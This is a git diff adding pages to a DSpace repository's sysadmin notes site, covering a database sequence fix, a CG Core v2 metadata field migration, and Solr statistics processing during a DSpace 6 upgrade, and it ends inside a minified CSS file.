The normal solution is to run the update-sequences.sql script (with Tomcat shut down) but it doesn’t seem to work in this case. Finding the maximum handle_id and manually updating the sequence seems to work:

+
dspace=# select * from handle where handle_id=(select max(handle_id) from handle);
+dspace=# select setval('handle_seq',86873);
+
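If you would rather not hard-code the value, the same update can be done in one statement (a sketch, not something that was run here):
+
dspace=# SELECT setval('handle_seq', (SELECT MAX(handle_id) FROM handle));
+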
+ + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/cgspace-cgcorev2-migration/index.html b/docs/cgspace-cgcorev2-migration/index.html new file mode 100644 index 000000000..e3607f543 --- /dev/null +++ b/docs/cgspace-cgcorev2-migration/index.html @@ -0,0 +1,521 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace CG Core v2 Migration | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

CGSpace CG Core v2 Migration

+ +
+

Changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2. Implemented on 2021-02-21.

+

With reference to the CG Core v2 draft standard by Marie-Angélique as well as DCMI DCTERMS.

+ +

Proposed Changes

+

As of 2021-01-18 the scope of the changes includes the following fields:

+
  • cg.creator.id→cg.creator.identifier
    • ORCID identifiers
  • dc.format.extent→dcterms.extent
  • dc.date.issued→dcterms.issued
  • dc.description.abstract→dcterms.abstract
  • dc.description→dcterms.description
  • dc.description.sponsorship→cg.contributor.donor
    • values from CrossRef or Grid.ac if possible
  • dc.description.version→cg.reviewStatus
  • cg.fulltextstatus→cg.howPublished
    • CGSpace uses values like “Formally Published” or “Grey Literature”
  • dc.identifier.citation→dcterms.bibliographicCitation
  • cg.identifier.status→dcterms.accessRights
    • current values are “Open Access” and “Limited Access”
    • future values are possibly “Open” and “Restricted”?
  • dc.language.iso→dcterms.language
    • current values are ISO 639-1 (aka Alpha 2)
    • future values are possibly ISO 639-3 (aka Alpha 3)?
  • cg.link.reference→dcterms.relation
  • dc.publisher→dcterms.publisher
  • dc.relation.ispartofseries will be split into:
    • series name: dcterms.isPartOf
    • series number: cg.number
  • dc.rights→dcterms.license
  • dc.source→cg.journal
  • dc.subject→dcterms.subject
  • dc.type→dcterms.type
  • dc.identifier.isbn→cg.isbn
  • dc.identifier.issn→cg.issn
  • cg.targetaudience→dcterms.audience
+
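For context, most of these mappings boil down to re-pointing metadatavalue rows from the old field to the new one in the metadata registry. This is a minimal sketch for a single mapping (dc.description.abstract→dcterms.abstract), assuming the stock metadatavalue, metadatafieldregistry, and metadataschemaregistry tables; the actual migration is done by the migrate-fields.sh script referenced below:

-- illustrative only: move dc.description.abstract values to dcterms.abstract
UPDATE metadatavalue
   SET metadata_field_id = (SELECT r.metadata_field_id
                              FROM metadatafieldregistry r
                              JOIN metadataschemaregistry s USING (metadata_schema_id)
                             WHERE s.short_id = 'dcterms' AND r.element = 'abstract' AND r.qualifier IS NULL)
 WHERE metadata_field_id = (SELECT r.metadata_field_id
                              FROM metadatafieldregistry r
                              JOIN metadataschemaregistry s USING (metadata_schema_id)
                             WHERE s.short_id = 'dc' AND r.element = 'description' AND r.qualifier = 'abstract');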

Out of Scope

+

The following fields are currently out of the scope of this migration because they are used internally by DSpace 5.x/6.x and would be difficult to change without significant modifications to the core of the code:

+
  • dc.title (IncludePageMeta.java only considers DC when building pageMeta, which we rely on in XMLUI because of XSLT from DRI)
  • dc.title.alternative
  • dc.date.available
  • dc.date.accessioned
  • dc.identifier.uri (hard coded for Handle assignment upon item submission)
  • dc.description.provenance
  • dc.contributor.author (IncludePageMeta.java only considers DC when building pageMeta, which we rely on in XMLUI because of XSLT from DRI)
+

Fields to Create

+

Make sure the following fields exist (one way to check is sketched after the list):

+
  • cg.creator.identifier (247)
  • cg.contributor.donor (248)
  • cg.reviewStatus (249)
  • cg.howPublished (250)
  • cg.journal (251)
  • cg.isbn (252)
  • cg.issn (253)
  • cg.volume (254)
  • cg.number (255)
  • cg.issue (256)
+
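A quick way to verify that one of these is already registered, assuming the stock registry tables (cg.creator.identifier used as the example, expected to come back as ID 247):

dspace=# SELECT r.metadata_field_id, s.short_id, r.element, r.qualifier FROM metadatafieldregistry r JOIN metadataschemaregistry s USING (metadata_schema_id) WHERE s.short_id = 'cg' AND r.element = 'creator' AND r.qualifier = 'identifier';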

Fields to Delete

+

Fields to delete after migration:

+
  • cg.creator.id
  • cg.fulltextstatus
  • cg.identifier.status
  • cg.link.reference
  • cg.targetaudience
+

Implementation Progress

+

A tally of the implementation status of the new fields in the CGSpace 6_x-cgcorev2 branch.

Field Name | migrate-fields.sh | Input Forms | XMLUI Themes¹ | dspace.cfg | Discovery | Atmire Modules | Crosswalks
cg.creator.identifier-
dcterms.extent----
dcterms.issued?
dcterms.abstract-
dcterms.description
cg.contributor.donor
cg.reviewStatus--
cg.howPublished----
dcterms.bibliographicCitation--
dcterms.accessRights-
dcterms.language-
dcterms.relation---
dcterms.publisher--
dcterms.isPartOf-
dcterms.license
cg.journal--
dcterms.subject
dcterms.type
cg.isbn---
cg.issn---
dcterms.audience---
+

There are a few things that I need to check once I get a deployment of this code up and running:

+
  • Assess the XSL changes to see if things like [not(@qualifier)] still make sense after we move fields from DC to DCTERMS, as some fields will no longer have qualifiers
  • Do I need to edit crosswalks that we are not using, like MODS?
  • There is potentially a lot of work in the OAI metadata formats like DIM, METS, and QDC (see dspace/config/crosswalks/oai/*.xsl)
+
+

¹ Not committed yet because I don’t want to have to make minor adjustments in multiple commits. Re-apply the gauntlet of fixes with the sed script:

+
$ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname "*.xsl" -exec sed -i -f ./cgcore-xsl-replacements.sed {} \;
+
diff --git a/docs/cgspace-dspace6-upgrade/index.html b/docs/cgspace-dspace6-upgrade/index.html
new file mode 100644
index 000000000..0571ce940
--- /dev/null
+++ b/docs/cgspace-dspace6-upgrade/index.html
@@ -0,0 +1,525 @@

CGSpace DSpace 6 Upgrade

+ +
+

Notes about the DSpace 6 upgrade on CGSpace in 2020-11.

+ +

Re-import OAI with clean index

+

After the upgrade is complete, re-index all items into OAI with a clean index:

+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
+$ dspace oai -c import
+

The process ran out of memory several times, so I had to keep retrying with more JVM heap memory.
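For example, retrying with a larger heap (the same pattern used for the Solr statistics processing below); the 4096m value here is only an illustration:

$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx4096m"
$ dspace oai -c import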

+

Processing Solr Statistics With solr-upgrade-statistics-6x

+

After the main upgrade process was finished and DSpace was running I started processing the Solr statistics with solr-upgrade-statistics-6x to migrate all IDs to UUIDs.

+

statistics

+

First process the current year’s statistics core:

+
$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics
+...
+=================================================================
+        *** Statistics Records with Legacy Id ***
+
+           3,817,407    Bistream View
+           1,693,443    Item View
+             105,974    Collection View
+              62,383    Community View
+             163,192    Community Search
+             162,581    Collection Search
+             470,288    Unexpected Type & Full Site
+        --------------------------------------
+           6,475,268    TOTAL
+=================================================================
+

After several rounds of processing it finished. Here are some statistics about unmigrated documents:

+
  • 227,000: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
  • 471,000: id:/.+-unmigrated/
  • 698,000: *:* NOT id:/.{36}/
  • Majority are type: 5 (aka SITE, according to Constants.java) so we can purge them:
+
$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
+
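For reference, the unmigrated-document counts above come from queries like the following against the same core; a sketch using curl, with rows=0 so that only the numFound count is returned:

$ curl -s -G "http://localhost:8081/solr/statistics/select" --data-urlencode 'q=*:* NOT id:/.{36}/' --data-urlencode 'rows=0'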

statistics-2019

+

Processing the statistics-2019 core:

+
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2019
+...
+=================================================================
+        *** Statistics Records with Legacy Id ***
+
+           5,569,344    Bistream View
+           2,179,105    Item View
+             117,194    Community View
+             104,091    Collection View
+             774,138    Community Search
+             568,347    Collection Search
+           1,482,620    Unexpected Type & Full Site
+        --------------------------------------
+          10,794,839    TOTAL
+=================================================================
+

After several rounds of processing it finished. Here are some statistics about unmigrated documents:

+
  • 2,690,309: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
  • 1,494,587: id:/.+-unmigrated/
  • 4,184,896: *:* NOT id:/.{36}/
  • 4,172,929 are type: 5 (aka SITE) so we can purge them:
+
$ curl -s "http://localhost:8081/solr/statistics-2019/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
+

statistics-2018

+

Processing the statistics-2018 core:

+
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2018
+...
+=================================================================
+        *** Statistics Records with Legacy Id ***
+
+           3,561,532    Bistream View
+           1,129,326    Item View
+              97,401    Community View
+              63,508    Collection View
+             207,827    Community Search
+              43,752    Collection Search
+             457,820    Unexpected Type & Full Site
+        --------------------------------------
+           5,561,166    TOTAL
+=================================================================
+

After some time I got an error about Java heap space so I increased the JVM memory and restarted processing:

+
$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx4096m'
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2018
+

Eventually the processing finished. Here are some statistics about unmigrated documents:

+
  • 365,473: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
  • 546,955: id:/.+-unmigrated/
  • 923,158: *:* NOT id:/.{36}/
  • 823,293 are type: 5 so we can purge them:
+
$ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
+

statistics-2017

+

Processing the statistics-2017 core:

+
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2017
+...
+=================================================================
+        *** Statistics Records with Legacy Id ***
+
+           2,529,208    Bistream View
+           1,618,717    Item View
+             144,945    Community View
+              74,249    Collection View
+             479,647    Community Search
+             114,658    Collection Search
+             852,215    Unexpected Type & Full Site
+        --------------------------------------
+           5,813,639    TOTAL
+=================================================================
+

Eventually the processing finished. Here are some statistics about unmigrated documents:

+
  • 808,309: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
  • 893,868: id:/.+-unmigrated/
  • 1,702,177: *:* NOT id:/.{36}/
  • 1,660,524 are type: 5 (SITE) so we can purge them:
+
$ curl -s "http://localhost:8081/solr/statistics-2017/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
+

statistics-2016

+

Processing the statistics-2016 core:

+
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2016
+...
+=================================================================
+        *** Statistics Records with Legacy Id ***
+
+           1,765,924    Bistream View
+           1,151,575    Item View
+             187,110    Community View
+              51,204    Collection View
+             347,382    Community Search
+              66,605    Collection Search
+             620,298    Unexpected Type & Full Site
+        --------------------------------------
+           4,190,098    TOTAL
+=================================================================
+
Summary of unmigrated docs after processing:

  • 849,408: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
  • 627,747: id:/.+-unmigrated/
  • 1,477,155: *:* NOT id:/.{36}/
  • 1,469,706 are type: 5 (SITE) so we can purge them:
+
$ curl -s "http://localhost:8081/solr/statistics-2016/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
+

statistics-2015

+

Processing the statistics-2015 core:

+
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2015
+...
+=================================================================
+        *** Statistics Records with Legacy Id ***
+
+             990,916    Bistream View
+             506,070    Item View
+             116,153    Community View
+              33,282    Collection View
+              21,062    Community Search
+              10,788    Collection Search
+              52,107    Unexpected Type & Full Site
+        --------------------------------------
+           1,730,378    TOTAL
+=================================================================
+

Summary of stats after processing:

+
  • 195,293: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
  • 67,146: id:/.+-unmigrated/
  • 262,439: *:* NOT id:/.{36}/
  • 247,400 are type: 5 (SITE) so we can purge them:
+
$ curl -s "http://localhost:8081/solr/statistics-2015/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
+

statistics-2014

+

Processing the statistics-2014 core:

+
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2014
+...
+=================================================================
+        *** Statistics Records with Legacy Id ***
+
+           2,381,603    Item View
+           1,323,357    Bistream View
+             501,545    Community View
+             247,805    Collection View
+                 250    Collection Search
+                 188    Community Search
+                  50    Item Search
+              10,918    Unexpected Type & Full Site
+        --------------------------------------
+           4,465,716    TOTAL
+=================================================================
+

Summary of unmigrated documents after processing:

+
  • 182,131: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
  • 39,947: id:/.+-unmigrated/
  • 222,078: *:* NOT id:/.{36}/
  • 188,791 are type: 5 (SITE) so we can purge them:
+
$ curl -s "http://localhost:8081/solr/statistics-2014/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
+

statistics-2013

+

Processing the statistics-2013 core:

+
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2013
+...
+=================================================================
+        *** Statistics Records with Legacy Id ***
+
+           2,352,124    Item View
+           1,117,676    Bistream View
+             575,711    Community View
+             171,639    Collection View
+                 248    Item Search
+                   7    Collection Search
+                   5    Community Search
+               1,452    Unexpected Type & Full Site
+        --------------------------------------
+           4,218,862    TOTAL
+=================================================================
+

Summary of unmigrated docs after processing:

+
  • 2,548: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
  • 29,772: id:/.+-unmigrated/
  • 32,320: *:* NOT id:/.{36}/
  • 15,691 are type: 5 (SITE) so we can purge them:
+
$ curl -s "http://localhost:8081/solr/statistics-2013/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
+

statistics-2012

+

Processing the statistics-2012 core:

+
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2012
+...
+=================================================================
+        *** Statistics Records with Legacy Id ***
+
+           2,229,332    Item View
+             913,577    Bistream View
+             215,577    Collection View
+             104,734    Community View
+        --------------------------------------
+           3,463,220    TOTAL
+=================================================================
+

Summary of unmigrated docs after processing:

+
  • 0: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
  • 33,161: id:/.+-unmigrated/
  • 33,161: *:* NOT id:/.{36}/
  • 33,161 are type: 3 (COLLECTION), which is different than I’ve seen previously… but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:
+
$ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
+

statistics-2011

+

Processing the statistics-2011 core:

+
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2011
+...
+=================================================================
+        *** Statistics Records with Legacy Id ***
+
+             904,896    Item View
+             385,789    Bistream View
+             154,356    Collection View
+              62,978    Community View
+        --------------------------------------
+           1,508,019    TOTAL
+=================================================================
+

Summary of unmigrated docs after processing:

+
  • 0: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
  • 17,551: id:/.+-unmigrated/
  • 17,551: *:* NOT id:/.{36}/
  • 12,116 are type: 3 (COLLECTION), which is different than I’ve seen previously… but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:
+
$ curl -s "http://localhost:8081/solr/statistics-2011/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
+

statistics-2010

+

Processing the statistics-2010 core:

+
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2010
+...
+=================================================================
+        *** Statistics Records with Legacy Id ***
+
+              26,067    Item View
+              15,615    Bistream View
+               4,116    Collection View
+               1,094    Community View
+        --------------------------------------
+              46,892    TOTAL
+=================================================================
+

Summary of unmigrated docs after processing:

+
  • 0: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
  • 1,012: id:/.+-unmigrated/
  • 1,012: *:* NOT id:/.{36}/
  • 654 are type: 3 (COLLECTION), which is different than I’ve seen previously… but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:
+
$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
+

Processing Solr statistics with AtomicStatisticsUpdateCLI

+

On 2020-11-18 I finished processing the Solr statistics with solr-upgrade-statistics-6x and I started processing them with AtomicStatisticsUpdateCLI.

+

statistics

+

First the current year’s statistics core, in 12-hour batches:

+
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics
+

It took ~38 hours to finish processing this core.

+

statistics-2019

+

The statistics-2019 core, in 12-hour batches:

+
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2019
+

It took ~32 hours to finish processing this core.

+

statistics-2018

+

The statistics-2018 core, in 12-hour batches:

+
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2018
+

It took ~28 hours to finish processing this core.

+

statistics-2017

+

The statistics-2017 core, in 12-hour batches:

+
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2017
+

It took ~24 hours to finish processing this core.

+

statistics-2016

+

The statistics-2016 core, in 12-hour batches:

+
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2016
+

It took ~20 hours to finish processing this core.

+

statistics-2015

+

The statistics-2015 core, in 12-hour batches:

+
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2015
+

It took ~21 hours to finish processing this core.

+

statistics-2014

+

The statistics-2014 core, in 12-hour batches:

+
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2014
+

It took ~12 hours to finish processing this core.

+

statistics-2013

+

The statistics-2013 core, in 12-hour batches:

+
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2013
+

It took ~3 hours to finish processing this core.

+

statistics-2012

+

The statistics-2012 core, in 12-hour batches:

+
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2012
+

It took ~2 hours to finish processing this core.

+

statistics-2011

+

The statistics-2011 core, in 12-hour batches:

+
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2011
+

It took 1 hour to finish processing this core.

+

statistics-2010

+

The statistics-2010 core, in 12-hour batches:

+
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2010
+

It took five minutes to finish processing this core.

diff --git a/docs/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css b/docs/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css
new file mode 100644
index 000000000..63f08e049
rgba(220,53,69,.5)}.btn-outline-danger.disabled,.btn-outline-danger:disabled{color:#dc3545;background-color:transparent}.btn-outline-danger:not(:disabled):not(.disabled).active,.btn-outline-danger:not(:disabled):not(.disabled):active,.show>.btn-outline-danger.dropdown-toggle{color:#fff;background-color:#dc3545;border-color:#dc3545}.btn-outline-danger:not(:disabled):not(.disabled).active:focus,.btn-outline-danger:not(:disabled):not(.disabled):active:focus,.show>.btn-outline-danger.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(220,53,69,.5)}.btn-outline-light{color:#f8f9fa;border-color:#f8f9fa}.btn-outline-light:hover{color:#212529;background-color:#f8f9fa;border-color:#f8f9fa}.btn-outline-light.focus,.btn-outline-light:focus{box-shadow:0 0 0 .2rem rgba(248,249,250,.5)}.btn-outline-light.disabled,.btn-outline-light:disabled{color:#f8f9fa;background-color:transparent}.btn-outline-light:not(:disabled):not(.disabled).active,.btn-outline-light:not(:disabled):not(.disabled):active,.show>.btn-outline-light.dropdown-toggle{color:#212529;background-color:#f8f9fa;border-color:#f8f9fa}.btn-outline-light:not(:disabled):not(.disabled).active:focus,.btn-outline-light:not(:disabled):not(.disabled):active:focus,.show>.btn-outline-light.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(248,249,250,.5)}.btn-outline-dark{color:#343a40;border-color:#343a40}.btn-outline-dark:hover{color:#fff;background-color:#343a40;border-color:#343a40}.btn-outline-dark.focus,.btn-outline-dark:focus{box-shadow:0 0 0 .2rem rgba(52,58,64,.5)}.btn-outline-dark.disabled,.btn-outline-dark:disabled{color:#343a40;background-color:transparent}.btn-outline-dark:not(:disabled):not(.disabled).active,.btn-outline-dark:not(:disabled):not(.disabled):active,.show>.btn-outline-dark.dropdown-toggle{color:#fff;background-color:#343a40;border-color:#343a40}.btn-outline-dark:not(:disabled):not(.disabled).active:focus,.btn-outline-dark:not(:disabled):not(.disabled):active:focus,.show>.btn-outline-dark.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(52,58,64,.5)}.btn-link{font-weight:400;color:#007bff;text-decoration:none}.btn-link:hover{color:#0056b3;text-decoration:underline}.btn-link.focus,.btn-link:focus{text-decoration:underline}.btn-link.disabled,.btn-link:disabled{color:#6c757d;pointer-events:none}.btn-lg{padding:.5rem 1rem;font-size:1.25rem;line-height:1.5;border-radius:.3rem}.btn-sm{padding:.25rem .5rem;font-size:.875rem;line-height:1.5;border-radius:.2rem}.btn-block{display:block;width:100%}.btn-block+.btn-block{margin-top:.5rem}input[type=button].btn-block,input[type=reset].btn-block,input[type=submit].btn-block{width:100%}.nav{display:flex;flex-wrap:wrap;padding-left:0;margin-bottom:0;list-style:none}.nav-link{display:block;padding:.5rem 1rem}.nav-link:focus,.nav-link:hover{text-decoration:none}.nav-link.disabled{color:#6c757d;pointer-events:none;cursor:default}.nav-tabs{border-bottom:1px solid #dee2e6}.nav-tabs .nav-link{margin-bottom:-1px;background-color:transparent;border:1px solid transparent;border-top-left-radius:.25rem;border-top-right-radius:.25rem}.nav-tabs .nav-link:focus,.nav-tabs .nav-link:hover{isolation:isolate;border-color:#e9ecef #e9ecef #dee2e6}.nav-tabs .nav-link.disabled{color:#6c757d;background-color:transparent;border-color:transparent}.nav-tabs .nav-item.show .nav-link,.nav-tabs .nav-link.active{color:#495057;background-color:#fff;border-color:#dee2e6 #dee2e6 #fff}.nav-tabs .dropdown-menu{margin-top:-1px;border-top-left-radius:0;border-top-right-radius:0}.nav-pills .nav-link{background:0 
0;border:0;border-radius:.25rem}.nav-pills .nav-link.active,.nav-pills .show>.nav-link{color:#fff;background-color:#007bff}.nav-fill .nav-item,.nav-fill>.nav-link{flex:1 1 auto;text-align:center}.nav-justified .nav-item,.nav-justified>.nav-link{flex-basis:0;flex-grow:1;text-align:center}.tab-content>.tab-pane{display:none}.tab-content>.active{display:block}.navbar{position:relative;display:flex;flex-wrap:wrap;align-items:center;justify-content:space-between;padding:.5rem 1rem}.navbar .container,.navbar .container-fluid,.navbar .container-lg,.navbar .container-md,.navbar .container-sm,.navbar .container-xl{display:flex;flex-wrap:wrap;align-items:center;justify-content:space-between}.navbar-brand{display:inline-block;padding-top:.3125rem;padding-bottom:.3125rem;margin-right:1rem;font-size:1.25rem;line-height:inherit;white-space:nowrap}.navbar-brand:focus,.navbar-brand:hover{text-decoration:none}.navbar-nav{display:flex;flex-direction:column;padding-left:0;margin-bottom:0;list-style:none}.navbar-nav .nav-link{padding-right:0;padding-left:0}.navbar-nav .dropdown-menu{position:static;float:none}.navbar-text{display:inline-block;padding-top:.5rem;padding-bottom:.5rem}.navbar-collapse{flex-basis:100%;flex-grow:1;align-items:center}.navbar-toggler{padding:.25rem .75rem;font-size:1.25rem;line-height:1;background-color:transparent;border:1px solid transparent;border-radius:.25rem}.navbar-toggler:focus,.navbar-toggler:hover{text-decoration:none}.navbar-toggler-icon{display:inline-block;width:1.5em;height:1.5em;vertical-align:middle;content:"";background:50%/100% 100% no-repeat}.navbar-nav-scroll{max-height:75vh;overflow-y:auto}@media (max-width:575.98px){.navbar-expand-sm>.container,.navbar-expand-sm>.container-fluid,.navbar-expand-sm>.container-lg,.navbar-expand-sm>.container-md,.navbar-expand-sm>.container-sm,.navbar-expand-sm>.container-xl{padding-right:0;padding-left:0}}@media (min-width:576px){.navbar-expand-sm{flex-flow:row nowrap;justify-content:flex-start}.navbar-expand-sm .navbar-nav{flex-direction:row}.navbar-expand-sm .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-sm .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-sm>.container,.navbar-expand-sm>.container-fluid,.navbar-expand-sm>.container-lg,.navbar-expand-sm>.container-md,.navbar-expand-sm>.container-sm,.navbar-expand-sm>.container-xl{flex-wrap:nowrap}.navbar-expand-sm .navbar-nav-scroll{overflow:visible}.navbar-expand-sm .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-sm .navbar-toggler{display:none}}@media (max-width:767.98px){.navbar-expand-md>.container,.navbar-expand-md>.container-fluid,.navbar-expand-md>.container-lg,.navbar-expand-md>.container-md,.navbar-expand-md>.container-sm,.navbar-expand-md>.container-xl{padding-right:0;padding-left:0}}@media (min-width:768px){.navbar-expand-md{flex-flow:row nowrap;justify-content:flex-start}.navbar-expand-md .navbar-nav{flex-direction:row}.navbar-expand-md .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-md .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-md>.container,.navbar-expand-md>.container-fluid,.navbar-expand-md>.container-lg,.navbar-expand-md>.container-md,.navbar-expand-md>.container-sm,.navbar-expand-md>.container-xl{flex-wrap:nowrap}.navbar-expand-md .navbar-nav-scroll{overflow:visible}.navbar-expand-md .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-md .navbar-toggler{display:none}}@media 
(max-width:991.98px){.navbar-expand-lg>.container,.navbar-expand-lg>.container-fluid,.navbar-expand-lg>.container-lg,.navbar-expand-lg>.container-md,.navbar-expand-lg>.container-sm,.navbar-expand-lg>.container-xl{padding-right:0;padding-left:0}}@media (min-width:992px){.navbar-expand-lg{flex-flow:row nowrap;justify-content:flex-start}.navbar-expand-lg .navbar-nav{flex-direction:row}.navbar-expand-lg .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-lg .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-lg>.container,.navbar-expand-lg>.container-fluid,.navbar-expand-lg>.container-lg,.navbar-expand-lg>.container-md,.navbar-expand-lg>.container-sm,.navbar-expand-lg>.container-xl{flex-wrap:nowrap}.navbar-expand-lg .navbar-nav-scroll{overflow:visible}.navbar-expand-lg .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-lg .navbar-toggler{display:none}}@media (max-width:1199.98px){.navbar-expand-xl>.container,.navbar-expand-xl>.container-fluid,.navbar-expand-xl>.container-lg,.navbar-expand-xl>.container-md,.navbar-expand-xl>.container-sm,.navbar-expand-xl>.container-xl{padding-right:0;padding-left:0}}@media (min-width:1200px){.navbar-expand-xl{flex-flow:row nowrap;justify-content:flex-start}.navbar-expand-xl .navbar-nav{flex-direction:row}.navbar-expand-xl .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-xl .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-xl>.container,.navbar-expand-xl>.container-fluid,.navbar-expand-xl>.container-lg,.navbar-expand-xl>.container-md,.navbar-expand-xl>.container-sm,.navbar-expand-xl>.container-xl{flex-wrap:nowrap}.navbar-expand-xl .navbar-nav-scroll{overflow:visible}.navbar-expand-xl .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-xl .navbar-toggler{display:none}}.navbar-expand{flex-flow:row nowrap;justify-content:flex-start}.navbar-expand>.container,.navbar-expand>.container-fluid,.navbar-expand>.container-lg,.navbar-expand>.container-md,.navbar-expand>.container-sm,.navbar-expand>.container-xl{padding-right:0;padding-left:0}.navbar-expand .navbar-nav{flex-direction:row}.navbar-expand .navbar-nav .dropdown-menu{position:absolute}.navbar-expand .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand>.container,.navbar-expand>.container-fluid,.navbar-expand>.container-lg,.navbar-expand>.container-md,.navbar-expand>.container-sm,.navbar-expand>.container-xl{flex-wrap:nowrap}.navbar-expand .navbar-nav-scroll{overflow:visible}.navbar-expand .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand .navbar-toggler{display:none}.navbar-light .navbar-brand{color:rgba(0,0,0,.9)}.navbar-light .navbar-brand:focus,.navbar-light .navbar-brand:hover{color:rgba(0,0,0,.9)}.navbar-light .navbar-nav .nav-link{color:rgba(0,0,0,.5)}.navbar-light 